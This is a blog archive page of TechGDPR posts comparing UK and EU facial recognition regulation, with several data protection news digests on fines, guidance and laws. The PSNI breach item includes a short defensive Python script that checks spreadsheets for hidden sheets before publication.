biometric data Archives - TechGDPR https://techgdpr.com/blog/tag/biometric-data/ Wed, 18 Jun 2025 11:18:36 +0000

Comparing the UK and EU’s framework on facial recognition technology https://techgdpr.com/blog/comparing-the-uk-and-eu-framework-on-facial-recognition-technology/ Mon, 26 May 2025 12:20:51 +0000

As advancements in technology affect all areas of our lives, law enforcement agencies and private companies are also testing the use of artificial intelligence (AI) for the purpose of public safety. Advanced Remote Biometric Identification (RBI), specifically in the form of Facial Recognition Technology (FRT), is currently at the centre of discussion. RBI refers to the use of artificial intelligence to identify individuals from a distance. The identification is possible because the AI matches the biometric features stored in a database against the features recorded by a device capable of remotely capturing said data. FRT is a type of RBI that focuses on unique facial features and compares them to data from a digital image or video, e.g. CCTV footage.

What does this mean around the world?

Countries such as the United States and the United Kingdom are increasingly moving towards reliance on these technologies. Countries in the EU are also recording findings from trial projects related to the use of Facial Recognition Technology. However, as the technology continues to evolve and becomes increasingly widespread, concerns arise about the potential consequences of using it. A majority of concerns focus on biases and consequences in relation to law enforcement. In addition, concerns about all individuals’ privacy rights are also at the forefront of the discussion, including:

  • Whether an indiscriminate recording of all individuals captured by cameras is aligned with the principle of data minimization;
  • Concerns on the lawfulness and transparency of the use of said technology, as further discussed below; and
  • Appropriate processing of special categories of personal data in accordance with legal requirements. 

Both the GDPR and its UK equivalent (the ‘UK-GDPR’) provide a legal framework setting standards for the use of this technology. However, the departure of the UK from the EU in 2020 means that the two jurisdictions are now implementing entirely different approaches to the use of Artificial Intelligence. This blog post analyses those differences, and their implications, with a focus on FRTs.

The history of public surveillance systems in the EU and the UK

Looking at the history of the implementation of public surveillance systems in the EU and in the UK sets the stage for highlighting the difference in the framework that applies to this day.

Public authorities and private actors have implemented video surveillance as one of the measures to ensure security since the middle of the 20th century. Camera systems such as CCTV have been increasingly appearing in UK cities since the 1950s, and have progressively evolved technologically. As a result, we are now at the point where South London will be installing its first permanent facial recognition cameras.

Similarly, Germany saw its first shift in the usage of cameras for public security reasons in the 1960s. By the 2000s, the majority of large European cities were deploying CCTV systems.

However, based on this history and according to researchers, the evolution in the technical capabilities of CCTV and its respective use in the EU has always lagged behind that of the UK. One of the reasons for this was the UK’s lack of constitutional protections for the right to privacy. Meanwhile, EU countries have demonstrably had a stricter approach to privacy even prior to the Data Protection Directive passed in 1995. The EU has implemented further protective measures since, such as the AI Act.

How does the use of facial recognition change between the EU and the UK?

While both jurisdictions use Facial Recognition Technology with the goal of enhancing public and national security, they differ vastly in how extensively they have applied it in practice.

The main difference is in its application, which is in turn related to the current regulatory differences. In the EU, current deployments of RBI systems are primarily experimental and localised. Examples of case studies include Facial Recognition Cameras at Brussels Airport, Facial Recognition at Hamburg G20, and the DragonFly Project in Hungary. There is currently no example of fully implemented and permanent FRT or RBI systems in the EU.

Additionally, the UK’s implementation of such systems is a current point of discourse across the country. As an example, part of the Met Police’s deployment policy for the overt use of live facial recognition to locate people on a watchlist is the ability to deploy Live Facial Recognition at “hotspots” for a number of crimes, ranging from theft and drugs to terrorism and human trafficking.

Additionally, the use has extended to private companies, such as the retail and hospitality sector, to take advantage of the technology to enhance security and prevent theft and revenue loss.

Regulatory similarities

In both the EU and the UK, the GDPR regulates the usage of all data processing technologies, including Facial Recognition Technology. The UK also implemented the regulation at national level with the Data Protection Act 2018. Therefore, a number of legal requirements, and issues of public concern are common for both jurisdictions:

  • Data needs to be processed lawfully, fairly and in a transparent manner. Public interest can be an applicable legal basis for public authorities and law enforcement (albeit not without justification). Private companies, however, are required to jump through more hurdles to justify the necessity and proportionality, and the outright lawfulness, of the use of FRTs, typically under legitimate interest;
  • Processing of biometric data means that Art. 9 special categories of personal data are being processed, adding an extra layer to the lawfulness argument. Such categories of data can only be processed pursuant to one of the exceptions listed in the Article 9. Again, reliance on substantial public interest could be an option, but not without having to make a balancing exercise, which leads to: the requirement to carry out a Data Protection Impact Assessment in accordance with Art. 35.3, where the usage of said technology arguably meets all 3 criteria;
  • Further considerations and concerns include breaches to the principles of purpose and storage limitation, and data minimisation. 

What is the regulatory approach to facial recognition in the EU?

However, in the EU, the newly implemented AI Act regulates the specific usage of real-time remote biometric identification systems in its Article 5. The article outright bans the use of AI systems that create or expand facial recognition databases through the untargeted scraping of facial images from the internet or CCTV footage and the use of ‘real-time’ remote biometric identification systems in publicly accessible spaces for the purposes of law enforcement, although the latter comes with exceptions. These include:

  • Search for abducted individuals, and victims of human trafficking and sexual exploitation;
  • Prevention of a specific, substantial and imminent threat to life or threat of terrorism; and
  • Localisation of a person suspected to have committed a criminal offence listed in Annex 2 of the Act (which does not include property damage, theft and/or burglary). 

Said exceptions, however, must still take into account the rights and freedoms of the individuals involved. Additionally, Article 27 of the AI Act requires a fundamental rights impact assessment, and law enforcement authorities must register the system in the EU database in accordance with Article 49.

How does the regulation framework differ in the UK?

Since its departure from the EU due to Brexit, the regulation of such technologies in the UK is entirely different. There is currently no AI-specific regulation in place. UK Parliament is currently discussing the only related legislation for the usage of such technologies, namely the Data Protection and Digital Information Bill.

Importantly, the draft of this bill demonstrates how the UK’s approach is the opposite of the EU’s, possibly leading to less regulation, for example through the abolition of the Biometrics and Surveillance Camera Commissioner (BSCC). The underlying argument is that the removal of this office, in a period of fast technological change, will result in the loosening of safeguards designed to raise standards and protect citizens, and may ultimately result in the deployment of technologies that are not in the public interest.

That is not to say that the use of said technologies will go entirely unchecked. The Information Commissioner’s Office made a statement about the usage of said technologies, calling for the responsible and lawful use of Facial Recognition Technology, and published guidance on the appropriate use of biometric recognition systems. However, the guidance still relies mostly on GDPR-based principles and rules. It does not add anything new to the conversation on the increased use of FRTs by law enforcement agencies or private companies, which might have legal implications for individuals. Therefore, the status quo remains that, in comparison with the EU, the UK is a regulatory sandbox for the use of such technologies. As a result, concerns arise about the ways this compliance vacuum could be exploited and the related risks for individuals.

Looking forward

Despite the technology being substantially more regulated in the EU, there is still criticism of the general use of FRTs, even with the GDPR and AI Act rules that apply to these technologies. Critics point to the vagueness of the definitions in the AI Act, the changes made to the AI Act draft from an outright ban on the technologies to an approach with “exceptions”, and the lack of clarity on the implementation of these technologies by private companies outside of law enforcement agencies.

Data protection digest 18 Aug – 2 Sep 2024: Swiss-US data transfers, BCR guide, Clearview AI fine https://techgdpr.com/blog/data-protection-digest-03092024-swiss-us-data-transfers-bcr-guide-clearview-ai-fine/ Tue, 03 Sep 2024 10:01:37 +0000

In this digest issue, we explore the latest Clearview AI fine, the secure Swiss-US data transfers, the data controller’s violation of the GDPR as subject to collective actions, the privacy risks of e-shop apps, and a new privacy policy generator and BCR monitoring tool.

Stay up to date! Sign up to receive our fortnightly digest via email.

Swiss-US data transfers

The new Data Privacy Framework now allows for the secure exchange of personal data between Switzerland and certified US companies without any additional guarantees. On 14 August the Swiss Federal Council added the US to the list of countries with an adequate level of data protection. The relevant changes will apply from 15 September. Companies certified under the Swiss-US data transfers framework will only be permitted to process the data for the purposes for which it was collected. Disclosure to third parties such as non-certified companies is not permitted. In the event of access by US public authorities to personal data transferred from Switzerland, various safeguards are provided, including access to a redress mechanism.

Collective actions under the GDPR

DLA Piper’s legal analysis looks at the CJEU’s recent decision (C-757/22), in which a violation of a controller’s information obligations under Art. 12 and 13 of the GDPR can be subject to a representative action under Art. 80 of the GDPR. The case relates to Meta’s processing activities, with the claim that the information provided to users by games in the App Center was unfair, particularly the failure to obtain valid consent from users. Instead, users were informed that by using certain games, the third-party provider would collect their data and have permission to publish it, and that they accepted the general conditions and the relevant data protection policies.

More legal updates

California AI legislation: The progress of the California bill that would create the first-ever national safety regulations for the biggest AI systems is examined in an article published in The Guardian. According to the proposal, businesses would have to test their models and make their safety procedures available to the public. The law focuses on systems whose training costs exceed 100 million dollars in data. As of right now, no AI model has reached that point. The governor of California has until the end of September to determine whether to sign it into law.

BCR compliance guide: To support groups holding BCRs in verifying their implementation, the French CNIL provides them with a tool and describes the steps for its deployment (available in English). BCRs are an intra-group data protection policy. They allow related entities to transfer personal data outside the EU, as provided for by the GDPR. Separate monitoring tools were developed for local entities and group DPOs and should be adapted to the particularities of the organisation.

Privacy notice tool

The UK Information Commissioner has replaced its privacy notice template with a generator tool to help you create a bespoke privacy notice in just a few simple steps. This brand-new tool has been designed for sole traders and start-ups, small and medium-sized businesses and charities. Also, by generating an additional privacy notice for your staff and volunteers, you could include this on your staff intranet, in your recruitment welcome packs or in your policies library.

E-shop applications

The Czech authorities have issued a warning about e-shop applications that require non-standard permissions on the user’s device and may collect excessive amounts of user data. Some of these permissions are completely legitimate, but some are inappropriate given the purpose of the application (eg, access to location, contacts, videos or other files). App users should therefore always carefully review the privacy policy and terms of use.

Additionally, extremely low prices in some e-shops can be attractive, but they carry the risk that the provider makes its profit in another way (eg, by excessive collection of personal data to pass on to third parties for a fee). If you nevertheless want to use an e-shop application that may carry the above-mentioned risks, for example for a one-time purchase, uninstall it from your device afterwards.

Guest access


The Data Protection Commissioner in Rhineland-Palatinate also launched an information campaign on online shops. It has become common practice to create a customer account for orders that last well beyond the individual purchase. Creating such a customer account can bring benefits to the customer. For example, further orders can be made without having to re-enter all the data, previous orders can be viewed, order and delivery status can be easily checked and favourite items can be saved.

However, customers do not always want such a long-term business relationship, so they should be able to freely decide whether or not they want their data stored in the online shop.

Contract as a legal basis

The Latvian data protection authority reminds us that one of the legal bases for the processing of personal data is the performance of a contract. However, to be able to correctly apply this basis, it is important to understand in which cases data processing is really necessary for this purpose. The application of this basis must be evaluated not only from the controller’s perspective but it must also be taken into account whether a person as a data subject, when entering into a contract, could have foreseen that their data would be processed within the framework of the contract:

  • the data must be processed to fulfil the obligations specified in the contract, (eg, an online store needs a customer’s address to be able to deliver the product with the help of a courier);
  • the data must be processed to fulfil obligations to the organisation (eg, a person orders a new TV in an electrical goods store, and the store processes the customer’s payment data to receive payment);
  • the contract has not been concluded, but the person has asked to perform an action, as a result of which the contract could be concluded, (eg, a person wants to buy travel insurance, but before buying it, they want to find out how much the policy will cost with a particular insurer, so they first submit their data to the insurer).

Finally, compliance with warranty provisions may also be a part of the performance of the contract, therefore it may require the storage of certain data even after the sale of the goods, and such processing will be justified by the performance of the contract.


AI analysis of phone conversations


The Danish regulator investigated an insurance company’s (IDA Forsikring) use of artificial intelligence for the analysis of recorded telephone conversations. It stated that incoming telephone calls were recorded, after which the audio files from the recordings were sent for analysis to a data processor, which converted the files into text using self-developed speech recognition, partly to make the sound files searchable. The purpose of the analysis of the conversations is to improve IDA Forsikring’s member service, ensure quality and give employees insight into their conversations to strengthen the service to members.

The regulator found this a valid legal basis under the GDPR, however, the current process for obtaining consent from the person calling in does not meet the data protection rules.

More enforcement decisions

Mass claim dismissed: A Dutch court has rejected collective damage claims in a data security case. The claims were made against several government agencies for inadequate protection of personal information, according to a cms-lawnow.com blog. There were significant security vulnerabilities in the IT systems that local health services employed during the COVID-19 pandemic. For months, some 35,000 employees had access to millions of people’s sensitive personal data. It was discovered that 1,250 people’s data had been taken. Based on European case law, the court deduced that non-material damages may only be granted to those who have suffered injury as a consequence of the GDPR violation. Concern about potential future misuse, arising from the possibility that third parties illegally obtained personal data, is insufficient.

Delayed data access request: The Belgian regulator sanctioned a telecom operator 100,000 euros for a 14-month-late reply to a right-to-access request. The complainant and the defendant went through a mediation process after a contractual issue. The accused party acknowledged its error. Still, the complainant was not satisfied and then made use of their access rights. Among other things, they were interested in learning the names of the workers who had processed their data and why they had done so. They submitted their request, making it clear that they wanted it forwarded to the DPO. Nevertheless, even though two staff worked on the request, it was neither approved nor forwarded to the DPO.

Data security


Biometrics and 2FA: Biometric procedures such as fingerprint and facial recognition are popular with consumers because they allow quick and easy access to online services as part of 2FA. But how secure is this authentication option in practice? The Federal Office for Information Security in Germany offers a white paper for developers and operators on biometric procedures in two-factor authentication (in German), where the knowledge factor (PIN or password) is replaced by biometrics.

Data protection-compliant redaction of documents: PDF and Office files can remain fully readable despite being blacked out with shapes or coloured bars, reiterates the Saxon data protection authority. Often, users only have to select the supposedly blacked-out content in the file and copy it into a text editor, and everything is readable again. Moreover, with the help of artificial intelligence, blurred content can certainly be reconstructed. It is therefore important that data is not only visually but also technically removed or edited (before any redaction, it is recommended to make a backup copy of the original file).

Also, because Office metadata may contain a history of changes and other information about the person, their location, etc, the redacted Office document should not be shared in its original file format (docx). Instead, save or export the file as a PDF document, or, if an editable version is necessary, copy all of the already anonymised text into a new document and share that new document. Similarly, an edited image must be saved in a file format in which the original layer cannot be restored. The JPG format, for example, is suitable for this.

Big Data


Uber case explained: Uber was fined 290 million euros by the Dutch regulator for failing to implement adequate measures when transferring drivers’ data, including certain sensitive categories, to the US. The company discontinued using the “Privacy Shield” in 2021 when it was shown to be invalid. Uber later said that it complies with the new EU-US Data Privacy Framework implemented only in 2023; nevertheless, there remain at least two years where driver data may not have been protected.

During this period of legal uncertainty, Uber was sending data to its San Francisco headquarters without the drivers’ express consent or the usage of the EU Model Standard Contractual Clauses (SCCs). 

Clearview AI fine: The Dutch data protection authority has imposed a fine of 30.5 million euros on Clearview AI, together with orders backed by penalty payments for non-compliance of up to more than 5 million euros. Clearview is an American company that offers facial recognition services. Among other things, Clearview has built an illegal database with billions of photos of faces, including of Dutch people. The Dutch regulator warns that using the services of Clearview is also prohibited.

Meta Pixel: The Swedish Data Protection Authority IMY decided on hefty fines against Apoteket and Apohem AB. This was after the companies used the Meta pixel on their websites and transferred privacy-sensitive personal data to Meta (the tool is dedicated to improving the company’s marketing on Facebook and Instagram). Moreover, the companies did not have the routines required to discover the deficiencies themselves. The transfer of personal data had been going on for a long time and was only stopped after the companies were made aware of the incident by third parties.

Data protection digest 18 May – 2 Jun 2024: decentralised clinical research, Meta’s new virtual assistant https://techgdpr.com/blog/data-protection-digest-05062024-decentralised-clinical-research-meta-ai-training/ Wed, 05 Jun 2024 07:43:31 +0000

In this issue, the personal data lifecycle in decentralised clinical research, Meta’s new AI chatbot, protections for organisations against data scraping, failed backup testing and spreadsheet error real examples, and much more.

Stay up to date! Sign up to receive our fortnightly digest via email.

Decentralised clinical research

To support sponsors in designing their decentralised clinical research projects, the French data protection authority CNIL, together with other state agencies, set up a pilot project (from January to September 2024). 20 selected projects will receive targeted support and updated guidance, looking especially at the entire lifecycle of personal data processing:

  • Roles and responsibilities, (oversight of incoming data);
  • Informed consent process, (interviews, leaflets, signatures);
  • Delivery of investigational products, (safety data, biological sample handling, home visits etc);
  • Data collection and management, (defining and handling source data);
  • Trial monitoring, (remote access).

In December 2022, the Commission published the European recommendations on decentralised clinical trials. It came after the COVID-19 pandemic, highlighting the importance of digital tools and decentralisation procedures in health research projects.

Meta’s AI virtual assistant under investigation in the EU

Norway’s data protection regulator reports that as of June 26, posts and photos on Facebook, (often of a private nature), and Instagram will be used to develop and improve Meta’s AI assistant service. This won’t include private messages to friends and family. Reportedly, Meta believes that the company does not need to ask for users’ consent since their interest in using the content outweighs the users’ interests and rights. The regulator has already received a complaint and started an investigation into the new practice and expects that there will be more complaints, both in Norway and in Europe. 

At the moment individuals in Norway can only object to it in a dedicated form on Facebook and Instagram if they wish.

Protections against Data Scraping

The Italian data protection authority has issued non-mandatory guidance on how public and private entities, in their capacity as data controllers, can protect the personal data they publish online from web scraping. It particularly targets the indiscriminate collection of personal data on the internet, carried out by third parties for training generative AI models. Some concrete measures (taking into account the latest technology and the costs of implementation, in particular for SMEs) may include:

  • creation of areas, accessible only upon registration, to remove data from public availability;
  • the inclusion of anti-scraping clauses in the terms of service of websites; 
  • the monitoring of traffic to web pages, to identify any abnormal flows of incoming and outgoing data; 
  • the technological solutions made available by the same companies responsible for web scraping, (eg, intervening on the robots.txt file).

Other official guidance

Data collection: Getting data collection right is key to your overall GDPR compliance, because once you have understood and complied with the principles at the point of collection, the same principles apply throughout the lifecycle of what you do with the data you hold, explains the Guernsey data protection authority. It also offers new guidance that applies regardless of the collection method (in-person interviews, emails, online forms, paper forms, video surveillance, social media activity, phone calls etc).

Dynamic data security: Data security measures must be viewed as a dynamic, as opposed to a static, obligation, according to the Guernsey regulator. In its latest statistical research, the agency found that the long-established trend of emails being sent to the wrong person continues to be the most commonly reported breach. At the same time, the vast majority of breaches were still discovered by individuals, and not through system auditing or testing. The regulator asks for a deeper understanding of the potential associated harms, ranging from “loss of confidentiality” to “emotional distress”, in order to properly assess the risk of such incidents.

‘Manage GDPR’: The Spanish regulator AEPD published a new version of its Manage GDPR tool (available in English). ‘Gestiona’ targets controllers and processors as well as data protection specialists. It allows managing the records of processing activities (ROPA), with up to 500 treatments, in an integrated way and for different entities. It is now possible to manage risk using the privacy measures that the tool suggests for each identified risk factor. The tool runs on the user’s device via their browser, without installing any application, and stores the information locally.

Legal processes

Anonymisation standard: The Quebec government has brought into force the Regulation respecting the anonymisation of personal information. It prescribes that once the purposes for which personal data was used are achieved, organisations (including the private sector) have two choices: destroy it, or anonymise it for use only for serious and legitimate purposes. It will largely apply from 2025.

UK Data Protection reform on hold: The Data Protection and Digital Information Bill falls ahead of a snap UK general election. As UK observers explain, any legislation that did not complete its passage by the end of the ‘wash-up’ on 24 May falls and will need to be reintroduced in the next Parliament. The draft bill was criticised for its flexibility towards data sharing in trade and innovation and state surveillance, threatening the adequacy decision granted by the EU. 

US Privacy and AI legislation: A good chunk of future privacy and AI bills has moved forward through state legislatures this past month. This includes the Maryland Age-Appropriate Design Code and other privacy acts, the Colorado Consumer Protections for AI Act, and the Vermont, Minnesota, and Kentucky Consumer Data Privacy Acts. California’s Bill on AI Accountability was read in the state Assembly, and the House of Representatives subcommittee advanced the American Privacy Rights Act Discussion Draft. 

Worldcoin on pause in Spain

The Worldcoin project committed to freeze its activity in Spain until the end of the year or until the final approval of its processing activities. The data protection authority of Bavaria, where the company has its main establishment in Europe, is progressing and is expected to conclude soon with a final binding decision. Worldcoin uses iris scans for unique identification with plans to expand for wider adoption of a global currency on the blockchain, explains the Techtarget.com article. The iris structure is used to generate a unique identifying code that is saved on the Worldcoin decentralised blockchain to prevent others from replicating the code.

The biometric data is not stored by the scanning device, but is kept in the form of an anonymised ‘IrisHash’.

More enforcement decisions

Failed backup testing: The Danish data protection authority criticised the breakdown of NemID in 2022, where up to 1.5 million users experienced problems logging in to major public services. The data controller followed their emergency procedure to restore the operation with a backup solution. This appeared to be unavailable, and the test to establish the viability of the backup solution was last carried out two years before the collapse. Such tests show whether recovery can be done with existing guides/procedures, that hardware, software, and data can work together, and that recovery can happen quickly enough as the consequences usually increase with time.

Spreadsheet error: In the UK, the Police Service of Northern Ireland is facing a 750,000 pound fine for failing to protect the personal information of its entire workforce. Personal information including surname, initials, rank and role of all 9,483 serving officers and staff was included in a “hidden” tab of a spreadsheet published online in response to a freedom of information request. The error caused several officers to move house, cut themselves off from family members and completely alter their daily routines because of the tangible fear of threat to life. The cause of the data breach was more than trivial as there were insufficient internal procedures and sign-off protocols for the safe disclosure of information.
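The PSNI breach above came from a worksheet that was hidden rather than deleted. An added example, not from TechGDPR or the ICO: a stdlib-only pre-disclosure gate that reads the workbook part of an .xlsx package and refuses release while any sheet is hidden. The sample workbook is constructed in memory.

```python
"""Pre-disclosure check: list hidden or very-hidden worksheets in an .xlsx
file before it is published (added example, stdlib only)."""
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the main workbook part in an Office Open XML spreadsheet.
NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}


def hidden_sheets(xlsx_bytes: bytes) -> list[tuple[str, str]]:
    """Return (sheet_name, state) for every sheet that is not visible.

    Excel records visibility in the optional 'state' attribute of each
    <sheet> element in xl/workbook.xml: absent or "visible", "hidden"
    (a user can unhide it) or "veryHidden" (only changeable through the
    object model, so it never shows in the Unhide dialog)."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        root = ET.fromstring(zf.read("xl/workbook.xml"))
    found = []
    for sheet in root.findall("m:sheets/m:sheet", NS):
        state = sheet.get("state", "visible")
        if state != "visible":
            found.append((sheet.get("name"), state))
    return found


def safe_to_publish(xlsx_bytes: bytes) -> bool:
    """Release gate: a workbook with any hidden sheet is not safe to publish."""
    return not hidden_sheets(xlsx_bytes)


def make_sample_workbook(sheets) -> bytes:
    """Constructed sample: a minimal package holding only the part this check
    reads. `sheets` is a list of (name, state_or_None)."""
    sheet_xml = "".join(
        f'<sheet name="{name}" sheetId="{i}" r:id="rId{i}"'
        + (f' state="{state}"' if state else "")
        + "/>"
        for i, (name, state) in enumerate(sheets, start=1)
    )
    workbook = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        f"<sheets>{sheet_xml}</sheets></workbook>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", workbook)
    return buf.getvalue()


# Constructed sample: a summary tab meant for release plus two tabs that
# would travel with the file unnoticed, as in the incident described above.
SAMPLE = make_sample_workbook([
    ("FOI response", None),
    ("Source data", "hidden"),
    ("Scratch", "veryHidden"),
])

if __name__ == "__main__":
    for name, state in hidden_sheets(SAMPLE):
        print(f"blocked: sheet {name!r} is {state}")
    print("safe to publish:", safe_to_publish(SAMPLE))
```

Copying only the visible rows into a fresh workbook, or exporting to CSV, avoids the problem entirely; the gate above is the check to run when the original file must be the one released.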

Data security

US financial entities: If your business is covered by the FTC’s Gramm-Leach-Bliley Safeguards Rule, an amendment that requires covered companies to report certain data breaches is now in effect. It lists thirteen distinct company categories, including payday lenders, mortgage lenders, finance companies, mortgage brokers, account servicers, cheque cashers, wire transfer services, collection agencies, tax preparation organisations, credit counsellors, and other financial consultants. According to the amendment, financial institutions must report to the FTC any security breach involving the personal data of at least 500 customers as soon as feasible, but no later than 30 days after discovery.

Big Data

Microsoft vs schools: Microsoft’s 365 Education services violate children’s privacy by shifting the responsibility to the school administrations, states the NOYB privacy advocacy group. Digital service providers like Microsoft tend to designate educational bodies as data controllers in their Terms and Conditions. However, in practice, the schools have no control over the applications, their design, and data operations. In just one example, they cannot satisfy data access requests by individuals as they don’t hold the necessary data.

Malware and data stealing: Law enforcement agencies in the US and EU announced massive operations against some of the most influential cybercrime platforms for delivering ransomware and data-stealing malware. They targeted droppers/loaders (custom-made programs designed to surreptitiously install malware onto a system), deployed through email attachments, hacked websites, or bundled with legitimate software. Droppers are typically used in the initial stages of a breach, and they allow cybercriminals to bypass security measures and deploy additional harmful programs.

ShinyHunters ransom: Meanwhile Ticketmaster in the US was hit by a data hack that may affect 560m customers, the Guardian reports. Cybercrime group ShinyHunters reportedly demanded a 400,000 pound ransom to prevent the data from being sold. The unauthorised access was spotted in a third-party cloud database environment containing the company’s data. Earlier, Santander bank also confirmed being hacked by the same group. ShinyHunters claimed it had the data of 30m customers and staff details, 6m account numbers and balances, and 28m credit card numbers, and is demanding a ransom of 1.6m pounds.

The post Data protection digest 18 May – 2 Jun 2024: decentralised clinical research, Meta’s new virtual assistant appeared first on TechGDPR.

Data protection digest 18 Apr – 02 May 2024: EU-US redress mechanism and European Health Data Space taking shape https://techgdpr.com/blog/data-protection-digest-06052024-eu-us-redress-mechanism-and-european-health-data-space-taking-shape/ Mon, 06 May 2024 08:42:35 +0000

As part of the new EU-US redress mechanism, data subjects in the EU/EEA will have access to specific complaint forms in the event that they suspect violations regarding their data transferred to the US, whether related to commerce or unlawful access to it by signals intelligence activities.

EU-US redress mechanism

The EDPB has completed its much-anticipated Information Note and a Complaint Form for EU/EEA individuals about alleged violations of US law concerning personal data collected by US national security authorities. It applies regardless of the transfer tool used to transfer the complainants’ data to the US (Data Privacy Framework, standard or ad hoc contractual clauses, binding corporate rules, codes of conduct, certification mechanisms, derogations). However, this redress mechanism only applies to data transmitted after 10 July 2023.

In short, after receiving and verifying the complaint, the data protection authority (DPA) will transmit it, in an encrypted format, to the EDPB Secretariat. The latter will then transmit it to the US authorities for a binding decision, taken by the Office of the Director of National Intelligence’s Civil Liberties Protection Officer (CLPO). Complainants can appeal the CLPO’s decision before the Data Protection Review Court within 60 days after receiving the notification from the DPA. There is also a possibility to complain about commercially related violations to EU DPAs.

In July 2023, the European Commission decided that the US ensures an adequate level of protection for personal data transferred from the EU to organisations in America that are included in the ‘Data Privacy Framework List’, without the need to rely on Art. 46 GDPR transfer tools (standard data protection clauses, binding corporate rules). The US Government in the meantime aims to introduce safeguards against bulk and targeted signals intelligence collection (eg, FISA Section 702) that apply to all data transferred to the US, regardless of the transfer tool used by the EU exporters.

More legal updates

FISA Section 702 reauthorised: In parallel, a new US bill just signed into law extends a key US surveillance program for another two years. Legislators claim the surveillance tool, first authorised in 2008, is crucial in disrupting terrorist attacks, cyber intrusions, and foreign espionage. It permits the government to collect, without a warrant, the communications of non-Americans outside the country. Amendments to protect Americans’ communications when they are in contact with those targeted foreigners, by requiring a prior warrant from a judge, failed at the final passage.

UK adequacy threatened: The Parliament’s Justice Committee (LIBE) has criticised the overall direction of the UK Government’s data policies. The government’s current actions are eliminating constraints arising from European or international law and limiting the impact of European court jurisdiction and interpretations on UK law. Concerns exist about UK intelligence agencies, especially their bulk collection of communications data, which is not in line with the EU Charter of Fundamental Rights. Thus, the UK could become a transit country for data that cannot be sent from the EU/EEA to “inadequate” third countries.

UK data protection reform moves on: The new Data Protection and Digital Information Bill went through the final examination of the committee stage. After the final reading, followed by the consideration of amendments stage in Parliament (which can be a lengthy process), it will be presented for Royal Assent to become law. The new law promises to solve the complexity of the current regulatory regime, reduce compliance costs, and remove barriers to responsible innovation so that firms, public sector organisations and consumers can take “full advantage of the benefits” of data.

Data Scraping

Data scraping by private actors is almost always illegal, explains the Dutch data protection authority AP. Scraping is the automatic collection and storage of information from the Internet. In several cases it is clearly not allowed, including: a) scraping the internet to create profiles of people and resell them; b) scraping information from protected social media accounts or private forums; c) scraping data from public social media profiles for insurance matters, etc.

A widespread misunderstanding is that scraping is allowed because everything on the internet is already available to everyone. Public availability does not imply consent by the individual. Scraping cannot rely on the legitimate interest of private businesses or individuals if the sole purpose is making money. However, scraping can be justified when a company gathers information from media outlets about its own activities.

More official guidance

Targeted advertising: A CJEU Advocate General’s opinion in the Schrems/Meta case (C-446/21) states that processing data for personalised advertising purposes cannot be justified merely by meeting the “manifestly made public” condition for special category data. Rather, it upholds the particular protection granted to the special categories of data under Art. 9 of the GDPR, which means that such data must still be evaluated as “ordinary” personal data: treated lawfully, transparently, and proportionately, and respecting the purpose limitation principle.

BCRs maturity test: The French data protection authority CNIL published a self-assessment tool to test the level of maturity of organisations’ Binding Corporate Rules for restricted data transfers. The companies concerned are multinational private businesses established in several countries of the EU and abroad. The set of resources covers all stages of a project, from its preparation to the approval procedure. The test is to be completed by the data protection officer or any other person in charge of the BCR project.

Health Breach Notification: The US Federal Trade Commission finalised changes to the Health Breach Notification Rule. It underscores its application to health apps and similar technologies not covered by HIPAA, and obliges them to notify individuals, the Commission, and, in some cases, the media of a breach of unsecured personally identifiable health data. It also requires third-party service providers to those vendors and related entities to notify them following the discovery of a breach.

Safe biometric technology use

The Dutch data protection authority AP answers some frequently asked legal questions about facial recognition. The document is intended for privacy professionals and organisations that want to use facial recognition. Facial recognition is in principle prohibited. One of the exceptions is when facial recognition is necessary for authentication or security purposes (eg, the security of a nuclear power plant, or military production needs). However, this applies only once a data protection impact assessment (DPIA) has been carried out, demonstrating that it is necessary and that there is an important public interest.

The AP also defines under which conditions there can be ‘personal or household use’ when applying facial recognition. For example, unlocking a phone with facial recognition qualifies if the biometric data is stored on the phone itself and the user decides what happens to that data. It must be up to the user to decide whether to unlock the phone using a PIN code or face recognition.

European Health Data Space

MEPs approved the creation of the European Health Data Space, improving citizens’ access to their health data and boosting secure sharing in the public interest. Universal electronic health records (EHR) will include patient summaries, electronic prescriptions, medical imagery and laboratory results. They will be available to health professionals across the EU (with the patient’s consent), and to trusted entities such as clinical researchers, statisticians and policy-makers (in an anonymised or pseudonymised format). Once officially published after the Council’s approval, it will apply two years later, with some temporary exceptions for specific categories of data.

Sim cards illicit activation fine

A company in Italy that manages two phone shops will have to pay 150 thousand euros for having illicitly activated SIMs, subscriptions and charges for the purchase of cell phones and GPS trackers using the personal data of hundreds of users without their knowledge. The company had activated 1300 telephone cards using data and identity documents extracted from the systems of the telephone operator whose products it sold, and unduly retained in-store. For instance, a complainant was charged on her credit card for the activation of a new contract in the name of her deceased husband.

The company had also activated unsolicited services by inducing customers to sign, via a tablet, without clarifying the consequences of such consents, along with selling mobile phones which had not been requested by customers nor delivered to them. The company had evaded the controls of the telephone operator and the related provisions regarding the processing of user data, thus acting as an independent data controller.

More enforcement decisions

Cookie collection without notice: The Croatian data protection regulator issued administrative fines of 15,000 and 20,000 euros on operators of gambling and betting activities for the illegal processing of personal data through cookies, without allowing users to give or withdraw their informed and voluntary consent. In particular, the operators did not provide a separate cookie banner or enable users to consent to different purposes (marketing, analytics/statistics).

The operators also did not adequately inform users about the legal basis, the groups/types of cookies, the function/purpose of each cookie, and the cookie storage period. In addition, the data controller was fined for processing users’ data at the very moment the website loaded (since users had not been informed about the processing).

Prohibited employment practices: The French CNIL ordered a company to minimise the collection of candidates’ data. The company required applicants to provide their place of birth, nationality, marital status (spouse’s name and surname, date and place of birth, their profession, the number of children and their ages), as well as all salaries received in previous companies. This information was not necessary for assessing the candidate’s ability to perform the job. An aggregate level of detail reflecting the candidate’s nationality (French, EU and non-EU categories) would suffice. The candidate could, however, on their own initiative, provide any useful information, including to justify their salary claims.

Ring case

